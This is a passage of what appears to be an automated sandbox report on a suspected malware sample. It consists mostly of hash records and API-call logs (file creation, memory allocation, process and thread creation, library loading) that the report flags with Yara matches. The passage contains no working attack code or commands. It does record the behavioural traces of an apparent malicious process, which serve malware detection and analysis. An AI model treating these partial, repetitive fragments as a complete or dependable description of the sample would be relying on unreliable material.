                                                • Opcode Fuzzy Hash: 4552ae55a9a2f80e9d2610e3f3c4cf63875cf958372e7da18bc5c42168d0eabd
                                                • Instruction Fuzzy Hash: 4E90027121504842D14075994805A470019A7D0346F91D011A0054694DD6658D65B6A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1b8359eca7b5c76cc9e5782d260cee1eff5607f66d585fa77a577b48b0fcb15
                                                • Instruction ID: 236fb15f91c7e9cb75090e7c520ddcb1722f874ad1c14b071038a400b4196dd8
                                                • Opcode Fuzzy Hash: a1b8359eca7b5c76cc9e5782d260cee1eff5607f66d585fa77a577b48b0fcb15
                                                • Instruction Fuzzy Hash: 7690027121140402D10065994C097470009A7D0343F91D011A5154555EC6A5C8A17571
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 28122b1f0ca0896a9fd580700a5849a6fd2800c3f97debfd0596f4d111c03645
                                                • Instruction ID: 8392d29cc7c1be4742fb2f5d9abed2b4565ce4f2822e33c8380caa9d651ba2db
                                                • Opcode Fuzzy Hash: 28122b1f0ca0896a9fd580700a5849a6fd2800c3f97debfd0596f4d111c03645
                                                • Instruction Fuzzy Hash: 6790027161500802D150759948157470009A7D0342F91D011A0014654DC7958A6576E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67fc2de22321cd42643f75af9e174e33a558d0254841bfe109f92a0e36fbb321
                                                • Instruction ID: 0b024f9be3c56336e56a8e7599f82478eb5dd57f26979d873084dc2bbf388fc7
                                                • Opcode Fuzzy Hash: 67fc2de22321cd42643f75af9e174e33a558d0254841bfe109f92a0e36fbb321
                                                • Instruction Fuzzy Hash: A790027121100842D10065994805B470009A7E0342F91D016A0114654DC655C8617561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eb065ff8ea1c6883391fb4c49c41a1fae2cef5d794e53475a1fa0a04e573eb77
                                                • Instruction ID: 3386bc019e551dad54f0b5943929364336cc906ad3dd643e730d4053231c4b28
                                                • Opcode Fuzzy Hash: eb065ff8ea1c6883391fb4c49c41a1fae2cef5d794e53475a1fa0a04e573eb77
                                                • Instruction Fuzzy Hash: 7F90026121144442D14066994C05B0F4109A7E1243FD1D019A4146554CC95588656761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: 4999c653315c198b6d398a642745e25efe1179146cfb596987748f7bf348b2bf
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 53%
                                                			E0167FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                				void* _t7;
                                                				intOrPtr _t9;
                                                				intOrPtr _t10;
                                                				intOrPtr* _t12;
                                                				intOrPtr* _t13;
                                                				intOrPtr _t14;
                                                				intOrPtr* _t15;
                                                
                                                				_t13 = __edx;
                                                				_push(_a4);
                                                				_t14 =  *[fs:0x18];
                                                				_t15 = _t12;
                                                				_t7 = E0162CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                				_push(_t13);
                                                				E01675720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                				_t9 =  *_t15;
                                                				if(_t9 == 0xffffffff) {
                                                					_t10 = 0;
                                                				} else {
                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                				}
                                                				_push(_t10);
                                                				_push(_t15);
                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                				return E01675720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                			}











                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0167FDFA
                                                Strings
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0167FE01
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0167FE2B
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: e955c36b2cab655744592292165d54813c4aaf57e6da307a4f11e6841a3ba4fd
                                                • Instruction ID: 85cd353987be4ac49de6544a20e200f59e5a51698fbad29f1b9e77357521f8ac
                                                • Opcode Fuzzy Hash: e955c36b2cab655744592292165d54813c4aaf57e6da307a4f11e6841a3ba4fd
                                                • Instruction Fuzzy Hash: 95F0F632200602BFE6205A59DC02F33BF6BEB44B30F140358F6285A1E1DA62F86097F5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,029A4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,029A4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 029AA3AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction ID: 73125a5a15cfeea4a69d11cfefad7193b9004b3ebfb39d2d4889dde37fa4781b
                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction Fuzzy Hash: D8F0BDB2200208AFCB48CF88DC94EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,029A4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,029A4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 029AA3AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: a480d55fbac36759cc906c85554ce17f8e96a6ee1a9322715e9f337facaa4ea0
                                                • Instruction ID: bc79b25932c42973f05fb4a91a4562b4a540c2c51c1edc5531d731e2522ac9c8
                                                • Opcode Fuzzy Hash: a480d55fbac36759cc906c85554ce17f8e96a6ee1a9322715e9f337facaa4ea0
                                                • Instruction Fuzzy Hash: E5F019B2214188ABCB08CF98D894CEB77A9EF8C314B14864DF94D93202C234E855CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(029A4D72,5EB65239,FFFFFFFF,029A4A31,?,?,029A4D72,?,029A4A31,FFFFFFFF,5EB65239,029A4D72,?,00000000), ref: 029AA455
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction ID: 87dc70044f89abcb06181cba6a129922d8a665b127a262649c54d4534e7700cc
                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction Fuzzy Hash: C9F0B7B2200208AFCB18DF89DC90EEB77ADEF8C754F158258BE1D97241D630E811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02992D11,00002000,00003000,00000004), ref: 029AA579
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: d4f4be829f66d1f65292dd75c1e124295ade1c12cfa36e25916f437572ce4cfe
                                                • Instruction ID: 5628954d3f416bd4c0fbac0eb2fdb14e86e536cf4e793fc6a7c39b1eed80f582
                                                • Opcode Fuzzy Hash: d4f4be829f66d1f65292dd75c1e124295ade1c12cfa36e25916f437572ce4cfe
                                                • Instruction Fuzzy Hash: D5F01CB6200148AFCB14DF98CC90EE777A9EF88354F158549FE5897245C630E811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02992D11,00002000,00003000,00000004), ref: 029AA579
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction ID: 87bcd424e3fc7dc55b390ad716696ebf1eddf5e6749fcee54c4b6a87f4385e1f
                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction Fuzzy Hash: 25F015B2200208AFCB18DF89CC80EAB77ADEF88754F118158BE0897241C630F810CBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtClose.NTDLL(029A4D50,?,?,029A4D50,00000000,FFFFFFFF), ref: 029AA4B5
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction ID: 274b2c4f473c8bb0f4fc575c9687cc998818a1e98fdaea12bb9e3dc15d43cccb
                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction Fuzzy Hash: A9D012762003146BD714EB98CC45E97776DEF44750F154455BA185B241C530F50086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.572537610.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                                • Associated: 0000000A.00000002.572680096.00000000048DB000.00000040.00000001.sdmp
                                                • Associated: 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(029A4536,?,029A4CAF,029A4CAF,?,029A4536,?,?,?,?,?,00000000,00000000,?), ref: 029AA65D
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02993AF8), ref: 029AA69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateFree
                                                • String ID: .z`
                                                • API String ID: 2488874121-1441809116
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 029A9128
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 029A9128
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02993AF8), ref: 029AA69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0299836A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0299838B
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0299836A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0299838B
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0299F1D2,0299F1D2,?,00000000,?,?), ref: 029AA800
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0299AD62
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                • Instruction ID: 41a020b1f7979b29d68d0b55769eb9c327a8646c578091ae1cde6f19f6921d48
                                                • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                • Instruction Fuzzy Hash: 3F011EB5D4020DBBDF10EAA4DC51FDDB7B99F54318F004595A90897240FA31EB54CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 029AA734
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: 86de5f1683cffaa751a7fe8f0b5df25270e87339d602de5e526973cae6ec59e2
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: C301B2B2210208BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0299F050,?,?,00000000), ref: 029A91EC
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: d001787dd8ca96fa65b2911aefc285a5cdad22473a2ac9871353164a03a2e4aa
                                                • Instruction ID: 62ffae361aeaa3834013f5d96d7fbb976f7846d4305a2c805db16d3e97b20284
                                                • Opcode Fuzzy Hash: d001787dd8ca96fa65b2911aefc285a5cdad22473a2ac9871353164a03a2e4aa
                                                • Instruction Fuzzy Hash: DDE092373803043AE3306599AC02FA7B39CDBC1B30F140026FA0DEB2C0D996F40146E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0299F050,?,?,00000000), ref: 029A91EC
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 38c6dc03e29f3650186a4f500d581285e1748c22d89d0a41b03e691686eb6f2f
                                                • Instruction ID: 789908ab53d84e27e17b04f42c7d7084f85767f3deff6fc9de64b95a20d07a0c
                                                • Opcode Fuzzy Hash: 38c6dc03e29f3650186a4f500d581285e1748c22d89d0a41b03e691686eb6f2f
                                                • Instruction Fuzzy Hash: 6FE04F763803003AE23065589C12FA7629D9BD1B20F250129FA49AB2C0DA96B80146E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(029A4536,?,029A4CAF,029A4CAF,?,029A4536,?,?,?,?,?,00000000,00000000,?), ref: 029AA65D
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction ID: 53a09253fe045a96b1157cd8b451ac9a9c472785d06cb1a5d772b787002037e6
                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction Fuzzy Hash: 73E012B2200208ABDB18EF99CC40EA777ADEF88654F118558BA085B241C630F910CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0299F1D2,0299F1D2,?,00000000,?,?), ref: 029AA800
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: 8028f80ad665a882b3f5ed33b18bd75b96133ac861e2fcf367bef7063256c2f6
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: 89E01AB12002086BDB14DF49CC84EE737ADEF88650F118164BA0857241C930E8108BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,02998D14,?), ref: 0299F6FB
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 41b7f5a14921240d1834d9ea541185d192e3a4f8be0c94967e3b19a0b0963967
                                                • Instruction ID: b2599c547498d109ace620d55ff1756019b45adc515deb31b6145f85fc534069
                                                • Opcode Fuzzy Hash: 41b7f5a14921240d1834d9ea541185d192e3a4f8be0c94967e3b19a0b0963967
                                                • Instruction Fuzzy Hash: EBE02BA057834439F724FA705C03F137A480B01714F2545ADE498F9093D944D0154235
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,02998D14,?), ref: 0299F6FB
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Offset: 02990000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                • Instruction ID: 4be16981fbf355ae60eda97727c04ae728d6c05296c8584d0ed50cb71a931b19
                                                • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                • Instruction Fuzzy Hash: B4D0A7717503083BEB10FAA89C13F2772CD5B44B14F590064F948D73C3DE90F0004565
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
